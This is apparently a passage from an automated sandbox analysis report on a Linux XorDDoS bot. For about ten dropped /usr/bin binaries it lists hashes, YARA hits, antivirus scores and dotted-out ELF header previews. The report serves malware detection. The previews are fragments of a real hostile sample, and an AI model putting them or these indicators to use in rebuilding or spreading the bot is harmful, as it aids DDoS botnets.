                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/becqudbgme, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/becqudbgme, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/becqudbgme, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244378524335209
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AK:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91D
                                                                  MD5:7B2961599910E9C0848D93F2A9E7562F
                                                                  SHA1:920212D1452C83B95D28110EBE018AA975DE02E2
                                                                  SHA-256:B9CB72C58BB3730ECE52FE19E0ADDF816D517E660070181DC846C49BC9EC9F22
                                                                  SHA-512:1CB776D2A066EB5C7BBD4EEBE012CADF461B8CC6FF20B9E4C02F062F31CEF5C395531335B8957DBBB52A8B8490868803D744D6536DD2B7314FA3C1B00E98F847
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/buxftyvhwp, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/buxftyvhwp, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/buxftyvhwp, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244379123757987
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AO:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91P
                                                                  MD5:9A54FA11D5B90703482052DCD884C96B
                                                                  SHA1:8DE199826F3D454E92EAE1CACA7B510D6E952C1B
                                                                  SHA-256:B014609C389BADA9943B49FD84477889E1318A1694136D7CE7495998D684D34E
                                                                  SHA-512:16334C8E7721EDC7B8A050B923ED72C3D592B36693B48C707A877699878C3091E76D9E04E1CFF833CEF192ADCB0C8DC0ABCD355F349AE32ACE16B6ED1017258D
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eqznayducj, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/eqznayducj, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eqznayducj, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244370622992582
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Av:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91W
                                                                  MD5:E0C968701DDBBEBDD70EB5C8F3ABEEB5
                                                                  SHA1:371D3AE601A6EF99C91E0385628E44E3845E7D05
                                                                  SHA-256:F328A7047D8AFDBE62FF246D6945DE54DAA94F779E88DA21DB33978B2181481B
                                                                  SHA-512:88F34D49E853356B63E2D192BEB62D509CBAFE20E210D835B8F082923DDA7F3967496BC0F4ACA01217FB0C0CE49A6C08FD7B9F743B4B0DA09A76B0AC6E7F43C6
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gnmftoxpza, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/gnmftoxpza, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gnmftoxpza, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):610304
                                                                  Entropy (8bit):6.209320084905849
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl3
                                                                  MD5:F8791A37A2A28594F2B8789A944E9D72
                                                                  SHA1:10362164DC9F61A9B2C00499369D681E08D07FC8
                                                                  SHA-256:2CD0E75134328030CA389CBB61CDCB6578E9A5426663607E752C1074C7602533
                                                                  SHA-512:4C379D39DA1ACA1C72F471B381D76524F5E8A67DE05086540DB8C253FA403E528DB1B5ABBBCA3B14EB9B7DC006A8D3EDEFE54C0FCE3D6C93E44B0E75178A60ED
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ibkljkndlm, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ibkljkndlm, Author: unknown
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ibkljkndlm, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244374588161023
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AN:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91M
                                                                  MD5:7800F11C348419E086E37DFB8E609C16
                                                                  SHA1:78AEDAA1E62826E96C4F344369AA21CD399C6C1B
                                                                  SHA-256:9B642F0CC0A5B37B22E56551D01C716C5EBC68F84627EE1240B79DC9FFEBD3DB
                                                                  SHA-512:16D2556850FFA107DCB07E1E585622C0F4067448E1F08464CA39F7CC6E5339E3C38117BE796971EE3CBFF2727B529738498814089CF2D9DB77D5A38FD4E968A9
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/iulapzbfpq, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/iulapzbfpq, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/iulapzbfpq, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/iulapzbfpq, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244383305929234
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/914
                                                                  MD5:487AAA06EE19B8DFAA6A6B2EEF2535E4
                                                                  SHA1:D628F6DE8896C7C26E8BAD77FCE1961C312D207F
                                                                  SHA-256:3B64DB86094C0BAFC0D90B55E8D1145E24185E88ECF9A923BFA46A4FB5FC9D88
                                                                  SHA-512:D2FE395A6684DB5CE5E63245EBEA2A6E75EB10F93D53609CAD1430BA9DFC11588409C05563BA9D1F33840E81ED0A10184400700276AC381B4F357F016DDEC716
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/kigdktzeum, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/kigdktzeum, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/kigdktzeum, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/kigdktzeum, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244374219217551
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1A3:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91q
                                                                  MD5:E0198A1A12F1F0963EE32AEAE9384D8B
                                                                  SHA1:EDCDFCA89E83051422B2B0C192F72F085B8377F7
                                                                  SHA-256:3F28E7ECAAEFF87714B439ED244CCBE4C6BE7A49D71859B304C96213961FBFF1
                                                                  SHA-512:3D9AC3CE9A92FE031ACBB61B0ED531F1C13042BF867A99D5E5E1312C7AA572CE0ED4D098B0EB296BA9F6228BC0FF4C67C3E5970D7A703E9F413661EAF5A67FE2
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mizdkrdyqj, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/mizdkrdyqj, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/mizdkrdyqj, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mizdkrdyqj, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244382322931526
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AJ:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/918
                                                                  MD5:1537102237A8F774A8EC3660DED7EA96
                                                                  SHA1:8A316C97E81283DA018F40E009AD46D3D79611F2
                                                                  SHA-256:CD44A667561A64DB1B2CF36CC2A1A70E324516DFD648B863AEFBCDE7F476F30A
                                                                  SHA-512:4FB8858C959442C08FA9632AB16669BAB5AAC2320D37EF26231A908EFCA1B7D3C8B3591AC26C54275330ECF7C9945142BF42196288EA2536C153B4F2AB0734A1
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/posifzmmhg, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/posifzmmhg, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/posifzmmhg, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/posifzmmhg, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.2443841351103435
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Ai:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/913
                                                                  MD5:1975C0CA7E1B7192BCCB225AF16F47B5
                                                                  SHA1:4502512CA11FE1557351D01696379CD4B1A61ED5
                                                                  SHA-256:361D454FF3E25D4817999BE5479ED5A57CE8483FF296534DA69EFF22DAA2EC5C
                                                                  SHA-512:751DCB6E935CB34C5AA84CDB24874639469E35E558BE0C3B22AED5A446EAD4FF260674C30B2BE41E7D678BA2F2F09F3A182C927D0976CEDC27705AD5F51EB15D
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qrabekbstr, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/qrabekbstr, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qrabekbstr, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qrabekbstr, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.2443797709295135
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91f
                                                                  MD5:60D7D2347AB3A1DD326249CA54EBFD91
                                                                  SHA1:CDEF088D12FDBF406DE3A3AC0C20D92D25F97CB3
                                                                  SHA-256:33E984A5259CE63099E626B26B54ECF767F165F58D8679C8ADCA3B73165FFFEC
                                                                  SHA-512:2AA7C517463861576B0622101161E6574290DF3DB538F68B4D9623A5739D1329FCEED7A3BADD5D7B0F5325465575040B191B998B793C9634D3EFCEE87624B737
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sotpizdssr, Author: Joe Security
